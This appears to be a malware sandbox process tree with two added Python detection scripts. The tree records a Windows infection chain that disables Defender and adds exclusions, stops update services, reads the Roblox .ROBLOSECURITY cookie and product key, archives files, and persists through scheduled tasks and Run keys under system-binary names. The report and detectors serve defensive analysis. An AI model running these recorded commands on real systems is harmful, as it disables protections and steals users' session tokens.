  cmdline: "C:\ProgramData\svchost.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 4852
[depth 12] C:\Windows\SysWOW64\WScript.exe
  cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2072
[depth 13] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2216
[depth 14] C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
  - Modifies WinLogon for persistence
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 3208
[depth 15] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xiercdjh\xiercdjh.cmdline"
  - Drops file in System32 directory
  PID: 940
[depth 16] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A6.tmp" "c:\Windows\System32\CSC53459E939ED4494494129E178E3262D8.TMP"
  PID: 1636
[depth 15] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CyuiE2IOf7.bat"
  PID: 3916
[depth 16] C:\Windows\system32\chcp.com
  cmdline: chcp 65001
  PID: 4700
[depth 16] C:\Windows\system32\w32tm.exe
  cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
  PID: 3828
[depth 16] C:\Users\Public\Videos\wininit.exe
  cmdline: "C:\Users\Public\Videos\wininit.exe"
  - Executes dropped EXE
  PID: 2696
[depth 11] C:\ProgramData\main.exe
  cmdline: "C:\ProgramData\main.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 4416
[depth 12] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAB34.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAB34.tmp.bat
  PID: 2264
[depth 13] C:\Windows\system32\tasklist.exe
  cmdline: Tasklist /fi "PID eq 4416"
  - Enumerates processes with tasklist
  PID: 1636
[depth 13] C:\Windows\system32\find.exe
  cmdline: find ":"
  PID: 3672
[depth 13] C:\Windows\system32\timeout.exe
  cmdline: Timeout /T 1 /Nobreak
  - Delays execution with timeout.exe
  PID: 4812
[depth 13] C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  PID: 2664
[depth 14] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
  PID: 3552
[depth 15] C:\Windows\system32\reg.exe
  cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
  - Adds Run key to start application
  - Modifies registry key
  PID: 4552
[depth 11] C:\ProgramData\setup.exe
  cmdline: "C:\ProgramData\setup.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID: 4424
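The ChainComServermonitor.exe node above is flagged for modifying Winlogon for persistence and adding a Run key, and the reg.exe call under main.exe writes a Run value named ChromeUpdate that points into the user's roaming profile. The following Python is an added example, not code from the sandbox or from the sample: it tokenises a Winlogon Shell value the way the value is written (comma-separated, with double quotes around paths that contain spaces), flags every entry beyond explorer.exe, and applies a simple origin check to a Run value. SAMPLE_SHELL is constructed in the shape the sample writes; SAMPLE_RUN is the value the reg add above creates.

```python
"""Added example; not code from the sandbox or the sample.  It checks the two
registry autostart values this branch writes: a Winlogon Shell value padded
with extra programs, and an HKCU Run value.  SAMPLE_SHELL is constructed in
the shape the sample uses; SAMPLE_RUN is the value the reg.exe call creates."""
import re

STANDARD_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
VENDOR_WORDS = ("google", "chrome", "microsoft", "update")

# Constructed sample values.
SAMPLE_SHELL = ('explorer.exe, "C:\\Users\\All Users\\TextInputHost.exe", '
                '"C:\\Users\\Public\\Music\\RuntimeBroker.exe", "C:\\Recovery\\WindowsRE\\dllhost.exe"')
SAMPLE_RUN = ("ChromeUpdate", r"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe")


def split_shell_value(value: str) -> list[str]:
    """Split a Winlogon Shell value on commas, honouring double quotes around paths with spaces."""
    entries, current, quoted = [], [], False
    for ch in value:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            entries.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    entries.append("".join(current).strip())
    return [e for e in entries if e]


def location_reasons(path: str) -> list[str]:
    """A logon-time program outside Windows or Program Files deserves a look."""
    return [] if path.lower().startswith(STANDARD_ROOTS) else ["not under Windows or Program Files"]


def classify_winlogon_shell(value: str) -> list[tuple[str, list[str]]]:
    """Anything beyond a bare explorer.exe in Winlogon\\Shell is an extra program run at every logon."""
    alerts = []
    for entry in split_shell_value(value):
        if entry.lower() == "explorer.exe":
            continue
        alerts.append((entry, ["extra Winlogon shell entry"] + location_reasons(entry)))
    return alerts


def classify_run_value(name: str, command: str) -> tuple[str, list[str]]:
    """Extract the executable from a Run value and flag vendor-branded binaries run from a user profile."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', command)
    exe = (m.group(1) or m.group(2)) if m else command
    reasons = location_reasons(exe)
    branded = any(w in (name + " " + exe).lower() for w in VENDOR_WORDS)
    if branded and exe.lower().startswith("c:\\users\\"):
        reasons.append("vendor-named autostart running from a user profile")
    return exe, reasons


if __name__ == "__main__":
    for entry, reasons in classify_winlogon_shell(SAMPLE_SHELL):
        print("Winlogon Shell:", entry, reasons)
    print("Run value:", *classify_run_value(*SAMPLE_RUN))
```

On a live host the same two functions can be fed the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell` and of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the Shell check is deliberately strict, because a clean machine has exactly one entry there.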
[depth 7] C:\ProgramData\Microsoft\based.exe
  cmdline: "C:\ProgramData\Microsoft\based.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID: 3492
[depth 8] C:\ProgramData\Microsoft\based.exe
  cmdline: "C:\ProgramData\Microsoft\based.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 1948
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
  - Suspicious use of WriteProcessMemory
  PID: 2632
[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2344
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
  - Suspicious use of WriteProcessMemory
  PID: 1796
[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 1296
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'" (the .scr file name consists of spaces and a non-printing character)
  - Suspicious use of WriteProcessMemory
  PID: 4092
[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 320
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  - Suspicious use of WriteProcessMemory
  PID: 3844
[depth 10] C:\Windows\system32\tasklist.exe
  cmdline: tasklist /FO LIST
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID: 5052
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  - Suspicious use of WriteProcessMemory
  PID: 1200
[depth 10] C:\Windows\system32\tasklist.exe
  cmdline: tasklist /FO LIST
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID: 1924
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  - Suspicious use of WriteProcessMemory
  PID: 2028
[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 4956
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  PID: 4960
[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  - Suspicious use of AdjustPrivilegeToken
  PID: 904
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\94z4R.zip" *"
  PID: 3344
[depth 10] C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\94z4R.zip" *
  - Executes dropped EXE
  PID: 2472
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
  PID: 3408
[depth 10] C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 1296
[depth 10] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic os get Caption
  - Suspicious use of AdjustPrivilegeToken
  PID: 1612
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
  PID: 3888
[depth 10] C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 4852
[depth 10] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic computersystem get totalphysicalmemory
  - Suspicious use of AdjustPrivilegeToken
  PID: 1200
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
  PID: 2164
[depth 10] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic csproduct get uuid
  PID: 3164
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
  PID: 880
[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  - Command and Scripting Interpreter: PowerShell
  PID: 4052
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
  PID: 904
[depth 10] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic path win32_VideoController get name
  - Detects videocard installed
  PID: 1176
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  PID: 4584
[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
  PID: 4820
[depth 3] C:\Users\Admin\AppData\Roaming\system user.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\system user.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID: 4080
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - Command and Scripting Interpreter: PowerShell
  PID: 2824
[depth 2] C:\Windows\System32\cmd.exe
  cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  PID: 4892
[depth 3] C:\Windows\System32\sc.exe
  cmdline: sc stop UsoSvc
  - Launches sc.exe
  PID: 2444
[depth 3] C:\Windows\System32\sc.exe
  cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID: 936
[depth 3] C:\Windows\System32\sc.exe
  cmdline: sc stop wuauserv
  - Launches sc.exe
  PID: 1036
[depth 3] C:\Windows\System32\sc.exe
  cmdline: sc stop bits
  - Launches sc.exe
  PID: 4416
[depth 3] C:\Windows\System32\sc.exe
  cmdline: sc stop dosvc
  - Launches sc.exe
  PID: 4412
[depth 2] C:\Windows\System32\dialer.exe
  cmdline: C:\Windows\System32\dialer.exe
  PID: 2632
[depth 2] C:\Windows\System32\schtasks.exe
  cmdline: C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  PID: 3672
[depth 2] C:\Windows\System32\schtasks.exe
  cmdline: C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  - Scheduled Task/Job: Scheduled Task
  PID: 4340
[depth 2] C:\Windows\System32\schtasks.exe
  cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  PID: 3392
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  PID: 3472
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  PID: 3644
[depth 1] C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID: 3832
[depth 1] C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 3992
[depth 1] C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 4104
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  PID: 3212
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  PID: 544
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  PID: 4420
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  PID: 1956
[depth 1] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  PID: 4936
[depth 1] C:\Windows\system32\SppExtComObj.exe
  cmdline: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID: 3576
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  PID: 632
[depth 1] C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID: 4528
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  PID: 3148
[depth 1] C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 3604
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
  PID: 3896
[depth 1] C:\Windows\system32\wbem\wmiprvse.exe
  cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  PID: 3328
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\TextInputHost.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 3840
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 4724
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 4980
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Music\RuntimeBroker.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 3772
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Music\RuntimeBroker.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 5100
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\RuntimeBroker.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 4012
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Videos\wininit.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 1512
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 4504
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 4020
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 1748
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 1924
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 2548
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\MSBuild\cmd.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 2648
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\cmd.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 840
[depth 2] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\MSBuild\cmd.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID: 2144
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup
  PID: 2168
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
  PID: 4500
[depth 1] C:\Windows\servicing\TrustedInstaller.exe
  cmdline: C:\Windows\servicing\TrustedInstaller.exe
  PID: 3772
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  PID: 1748
[depth 1] C:\Windows\System32\mousocoreworker.exe
  cmdline: C:\Windows\System32\mousocoreworker.exe -Embedding
  PID: 3112
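The tree above records three behaviours worth alerting on regardless of which family is behind them: Defender being disabled and given exclusions through Set-MpPreference, Add-MpPreference and MpCmdRun -RemoveDefinitions; the Windows Update service chain (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc) being stopped; and scheduled tasks created with /rl HIGHEST or /sc ONLOGON whose targets carry Windows binary names (wininit.exe, dllhost.exe, RuntimeBroker.exe, cmd.exe) in directories where those binaries do not belong. The following Python is an added example, not code from the sandbox or from the sample: it applies those rules to constructed process-creation events whose command lines are copied from the tree (the pid, image and cmdline field names are an assumption; map them to your Sysmon or EDR schema).

```python
"""Added detection example; this is not code from the sandbox or the sample.
It applies command-line rules for the behaviours recorded in the tree above to
constructed process-creation events (field names pid/image/cmdline are an
assumption; map them to your Sysmon or EDR schema)."""
import re
from pathlib import PureWindowsPath

# Constructed events; command lines are taken from the tree above (one shortened).
EVENTS = [
    {"pid": 1296, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
                "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
                "-DisableScriptScanning $true -MAPSReporting Disabled -SubmitSamplesConsent NeverSend"},
    {"pid": 2344, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"},
    {"pid": 1796, "image": r"C:\Windows\system32\cmd.exe",  # shortened to the last command of the chain
     "cmdline": r'cmd.exe /c "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"pid": 4892, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"},
    {"pid": 4504, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'''schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f'''},
    {"pid": 840, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'''schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\cmd.exe'" /rl HIGHEST /f'''},
    {"pid": 2696, "image": r"C:\Users\Public\Videos\wininit.exe",
     "cmdline": r'"C:\Users\Public\Videos\wininit.exe"'},
    {"pid": 4700, "image": r"C:\Windows\system32\chcp.com", "cmdline": "chcp 65001"},  # benign control
]

DEFENDER_TAMPER = re.compile(
    r'''Set-MpPreference\b.*-Disable\w+\s+\$true'''
    r'''|Add-MpPreference\b.*-ExclusionPath'''
    r'''|MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions''', re.IGNORECASE)
SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\w+)", re.IGNORECASE)
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
SCHTASKS_CREATE = re.compile(r'''schtasks(?:\.exe)?\s+/create\b.*?/tr\s+"?'?([^"']+)''', re.IGNORECASE)
TASK_PERSISTS = re.compile(r"/rl\s+highest|/sc\s+onlogon", re.IGNORECASE)
# Names of Windows binaries the sample reuses for its dropped files.
SYSTEM_BINARY_NAMES = {"wininit.exe", "dllhost.exe", "runtimebroker.exe", "svchost.exe",
                       "cmd.exe", "textinputhost.exe"}
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}


def masquerades_as_system_binary(path: str) -> bool:
    """True when a file carries a system-binary name but sits outside the Windows directories."""
    p = PureWindowsPath(path.strip().strip('"').lower())
    return p.name in SYSTEM_BINARY_NAMES and str(p.parent) not in SYSTEM_DIRS


def evaluate(event: dict) -> list[str]:
    """Names of the rules that fire on a single process-creation event."""
    cmd, hits = event["cmdline"], []
    if DEFENDER_TAMPER.search(cmd):
        hits.append("defender_tamper")
    if len({s.lower() for s in SC_STOP.findall(cmd)} & UPDATE_SERVICES) >= 3:
        hits.append("update_services_stopped")
    task = SCHTASKS_CREATE.search(cmd)
    if task and TASK_PERSISTS.search(cmd) and masquerades_as_system_binary(task.group(1)):
        hits.append("schtasks_masquerading_target")
    if masquerades_as_system_binary(event["image"]):
        hits.append("masquerading_image")
    return hits


def scan(events: list[dict]) -> tuple[dict, set]:
    """Per-PID hits plus the union of update-related services stopped anywhere in the batch,
    so that five separate `sc stop` children still add up to the kill chain."""
    stopped = set()
    for e in events:
        stopped |= {s.lower() for s in SC_STOP.findall(e["cmdline"])} & UPDATE_SERVICES
    return {e["pid"]: evaluate(e) for e in events}, stopped


if __name__ == "__main__":
    hits, stopped = scan(EVENTS)
    for pid, rules in hits.items():
        print(pid, rules or "-")
    print("update services stopped:", sorted(stopped))
```

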